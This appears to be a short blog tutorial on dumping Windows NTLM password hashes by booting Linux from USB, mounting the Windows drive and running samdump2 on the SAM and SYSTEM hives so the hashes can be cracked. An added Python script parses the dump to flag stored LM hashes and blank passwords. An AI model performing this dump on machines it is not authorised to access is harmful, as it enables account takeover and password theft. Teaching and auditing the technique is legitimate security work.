
Extract NTLM Hashes via Linux Live Boot

Using a live boot of Linux, we can extract the NTLM hashes of the Windows accounts on a computer and then attempt to crack them to recover the passwords.

  1. Prerequisites
  2. Mount Drive
  3. Dump Hashes

Prerequisites

  • Physical access to a Windows machine without BitLocker
  • Bootable Linux USB (ideally Kali)


Mount Drive

Create a new directory where the drive will be mounted:

mkdir FOLDER_NAME

List block devices:

lsblk

Mount the primary Windows partition (it should be the largest one listed):

mount /dev/PARTITION_NAME FOLDER_NAME

  • FOLDER_NAME is the folder created above


Dump Hashes

Navigate to Windows/System32/config in the mounted drive and run:

samdump2 SYSTEM SAM

  • Hashes will be in PWDump format: <username>:<uid>:<LM-hash>:<NTLM-hash>:<comment>:<homedir>:
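The PWDump lines above are what an auditor reviews after such a dump, so here is a small parser for that format. This is an added example for this post, not code from the original post or from the samdump2 project. It reads the seven colon-separated fields, validates the two 32-hex-character hashes, and reports the two findings a hardening review most cares about: accounts that still store an LM hash (legacy, weak) and accounts whose NT hash is the well-known empty-password value. The sample lines and every hash value in them are constructed placeholders, not real output from any machine; only the two "empty" hash constants are the real, publicly documented values.

```python
"""Parse samdump2-style PWDump output and flag weak credential storage.

Added example for this post; not part of the original post and not from
the samdump2 project. The sample lines below are constructed.
"""
import re

# Well-known constants: the values Windows stores for an empty password.
# An "empty" LM hash means LM storage is disabled for that account (the
# modern default); an "empty" NT hash means the account has a blank password.
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"

HEX32 = re.compile(r"^[0-9a-f]{32}$")

# Constructed sample in the post's format:
#   <username>:<uid>:<LM-hash>:<NTLM-hash>:<comment>:<homedir>:
# The non-empty hashes here are made-up placeholders, not real hashes.
SAMPLE_PWDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacyuser:1001:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
broken line without enough fields
"""


def parse_pwdump_line(line):
    """Return a dict for one PWDump line, or None if it is not well-formed."""
    parts = line.rstrip("\n").split(":")
    # Seven fields: the trailing colon produces an empty last element.
    if len(parts) != 7:
        return None
    username, uid, lm_hash, nt_hash, comment, homedir, _ = parts
    lm_hash = lm_hash.lower()
    nt_hash = nt_hash.lower()
    if not (uid.isdigit() and HEX32.match(lm_hash) and HEX32.match(nt_hash)):
        return None
    return {
        "username": username,
        "uid": int(uid),
        "lm_hash": lm_hash,
        "nt_hash": nt_hash,
        "comment": comment,
        "homedir": homedir,
    }


def audit_pwdump(text):
    """Parse every line and return (lineno, username, finding) tuples."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        rec = parse_pwdump_line(line)
        if rec is None:
            findings.append((lineno, None, "unparseable line"))
            continue
        if rec["lm_hash"] != EMPTY_LM_HASH:
            findings.append((lineno, rec["username"], "LM hash stored (legacy, weak)"))
        if rec["nt_hash"] == EMPTY_NT_HASH:
            findings.append((lineno, rec["username"], "blank password"))
    return findings


if __name__ == "__main__":
    for lineno, user, finding in audit_pwdump(SAMPLE_PWDUMP):
        print(f"line {lineno}: {user or '-'}: {finding}")
```

Run against the constructed sample, the audit reports a blank password on the Guest line, a stored LM hash on the legacyuser line, and one unparseable line; the Administrator line produces no finding because its LM slot holds the "empty" value and its NT hash is not the blank-password value. Either finding is a configuration defect worth fixing on the machine the dump came from (disable LM hash storage, set a password or disable the account), independent of any cracking attempt.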
This post is licensed under CC BY 4.0 by the author.